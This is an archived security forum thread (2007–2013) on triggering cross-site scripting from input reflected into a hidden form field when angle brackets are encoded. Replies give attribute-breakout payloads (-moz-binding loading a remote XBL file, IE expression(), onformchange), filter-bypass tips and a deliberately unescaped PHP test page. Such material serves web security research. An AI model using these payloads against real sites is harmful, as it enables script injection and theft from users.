Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
XSS in hidden field?
Posted by: xj
Date: November 06, 2007 12:44PM

Hi,

is it possible to have an exploit here?

<input type="hidden" value="INPUT" name="test">

INPUT is user input
< and > are encoded

events such as onmouseover has no effect on hidden field

regards

Options: ReplyQuote
Re: XSS in hidden field?
Posted by: kirke
Date: November 06, 2007 02:50PM

hxxp://...your-url-here-....?test="><b>bingo

Options: ReplyQuote
Re: XSS in hidden field?
Posted by: Spyware
Date: November 06, 2007 02:56PM

"><script>alert(1)</script> as INPUT
=]

It's that easy.

EDIT: Oops, didn't read carefully. Let me see what I can come up with...



Edited 1 time(s). Last edit at 11/06/2007 03:04PM by Spyware.

Options: ReplyQuote
Re: XSS in hidden field?
Posted by: xj
Date: November 06, 2007 02:59PM

< and > are encoded..

Options: ReplyQuote
Re: XSS in hidden field?
Posted by: kuza55
Date: November 07, 2007 02:33AM

In IE you're best bet is to use this vector: http://ha.ckers.org/xss.html#XSS_DIV_expression

And fir Firefox you should use this one: http://ha.ckers.org/xss.html#XSS_Remote_style_sheet_part_4 (just embed the e-moz-binding attribute in the style attribute as in the IE one)

If you're trying to attack Opera though, I think you're out of luck.

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]

Options: ReplyQuote
Re: XSS in hidden field?
Date: November 13, 2007 07:49AM

<input type="hidden" value="INPUT" name="test">

take for INPUT this:

whatever" type="image" src="dontcare.jpg" onerror="alert(123)

Options: ReplyQuote
Re: XSS in hidden field?
Posted by: Anonymous User
Date: November 13, 2007 08:40AM

That wont' work - type attributes can't be overwritten anymore.

Options: ReplyQuote
Re: XSS in hidden field?
Date: November 13, 2007 09:30AM

oh ok my fault ;-)

Options: ReplyQuote
Re: XSS in hidden field?
Posted by: Gareth Heyes
Date: November 13, 2007 10:03AM

Styles are the way to go man! :)

" style="-moz-binding:url('http://www.businessinfo.co.uk/labs/xbl/xbl.xml%23xss')

Firefox only but you could use, background-image for IE 6 or @import rules and maybe even background="javascript:alert(/XSS/)" for Opera

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 11/13/2007 10:10AM by Gareth Heyes.

Options: ReplyQuote
Re: XSS in hidden field?
Posted by: Gareth Heyes
Date: November 13, 2007 10:17AM

Save as testxss.php:-
<?php
echo '<input type="hidden" name="x" value="'.$_GET['x'].'">';
?>

Replace the x with t obviously to test it:-

hxtp://localhost/testxss.php?x=" style="-moz-binding:url('http://www.businessinfo.co.uk/labs/xbl/xbl.xml%23xss')

%23 is the # symbol urlencoded, it won't work without this.

You'll need PHP and a local server to test or other server side language. I tested on FF 2.0.0.9

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 11/13/2007 10:28AM by Gareth Heyes.

Options: ReplyQuote
Re: XSS in hidden field?
Posted by: xj
Date: November 14, 2007 12:44PM

thanks! using style does work.

Options: ReplyQuote
Re: XSS in hidden field?
Posted by: hackathology
Date: November 18, 2007 09:41AM

has anyone tried the DIV one with <DIV STYLE="width: expression(alert('XSS'));"> in IE?

http://hackathology.blogspot.com



Edited 1 time(s). Last edit at 11/18/2007 09:42AM by hackathology.

Options: ReplyQuote
Re: XSS in hidden field?
Posted by: timb
Date: November 18, 2007 12:06PM

Using '" style="bahaviour:expression(function{}{ alert('xxs') }(this)}' works a treat up to and including IE7. We've been using it all weak on ASP.net applications with the XSS checks enabled.

Options: ReplyQuote
Re: XSS in hidden field?
Posted by: Mephisto
Date: November 18, 2007 08:22PM

timb,
I don't see how that is possible? The .NET framework prevents "expression" tags. The only known work around (which has been fixed) was to use "expr/**/ession" or some other various that included the /**/ comment characters.

Would you mind explaining the context in which you are injecting this vector?



Edited 1 time(s). Last edit at 11/18/2007 08:22PM by Mephisto.

Options: ReplyQuote
Re: XSS in hidden field?
Posted by: Martin
Date: November 22, 2007 03:24PM

Mephisto: They might have disabled RequestValidation - he did say weak applications!

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Options: ReplyQuote
Re: XSS in hidden field?
Posted by: john-doe
Date: December 03, 2007 03:34PM

I like the moz-binding "feature" but what if " is also encoded? I wonder myself if there's another way?

Options: ReplyQuote
Re: XSS in hidden field?
Posted by: krayknot
Date: August 28, 2009 12:29AM

Yes you can pass XSS in hidden field

follow the following instructions:
1) Head over to the web page you want to edit.

2) In the browser’s address bar, paste this code:

javascript:document.body.contentEditable='true'; document.designMode='on'; void 0

3) Now click on the part of the page you want to edit and start changing, deleting and adding text.

4) When you finished with the editing, change the property of contentEditable to 'false'. Now you are able to post with the change content.

Source: www.krayknot.om



Edited 2 time(s). Last edit at 09/25/2009 05:35AM by krayknot.

Options: ReplyQuote
Re: XSS in hidden field?
Posted by: Gareth Heyes
Date: August 28, 2009 02:46AM

@krayknot

Why why why? Why do you bother submitting this crap content just for SEO. Get a life

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: XSS in hidden field?
Posted by: PaPPy
Date: August 28, 2009 07:00AM

or get a plugin like firebug for firefox. or save the form to your desktop.

plus this has nothing to do with xss in a hidden field

what the post is about, if ur too lazy to read is, if you find some xss that is inserted into a hidden field, you cant do onmouseover because it's hidden

this page gave some suggestions to still fire off ur XSS

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: XSS in hidden field?
Posted by: ademix
Date: August 29, 2009 02:06PM

PaPPy Wrote:
-------------------------------------------------------
> what the post is about, if ur too lazy to read is,
> if you find some xss that is inserted into a
> hidden field, you cant do onmouseover because it's
> hidden

You can still do onmouseover on hidden field with some CSS :
<input type="hidden" onmouseover="javascript:alert(1)" style="display:block; width:500px; height:500px;" />
And your input become visible. Worked on Firefox, I didn't test it on IE or other.

http://www.ademix.net/

Options: ReplyQuote
Re: XSS in hidden field?
Posted by: Anonymous User
Date: August 29, 2009 02:38PM

Yep - written up here http://maliciousmarkup.blogspot.com/2008/11/hidden-fields-vs-css.html - Still a FF only issue.

Options: ReplyQuote
Re: XSS in hidden field?
Posted by: Albino
Date: January 04, 2013 02:10PM

For posterity, none of the above techniques appear to work anymore but this works in Opera:

<input type=hidden onformchange=alert(2)/>

Courtesy of http://html5sec.org/#23

-------------------------------------------------------
Research blog

Options: ReplyQuote
Re: XSS in hidden field?
Posted by: kamal
Date: February 26, 2013 01:46PM

Hi,

I have the same scenario but apart from <,> symbols... application filters (,) symbols also... So I can't use something like alert()... Can anyone help me on this

Options: ReplyQuote
Re: XSS in hidden field?
Posted by: Albino
Date: March 23, 2013 08:54AM

onformchange="document.innerHTML=location.hash"

See also http://www.thespanner.co.uk/2012/05/01/xss-technique-without-parentheses/

-------------------------------------------------------
Research blog

Options: ReplyQuote


Sorry, only registered users may post in this forum.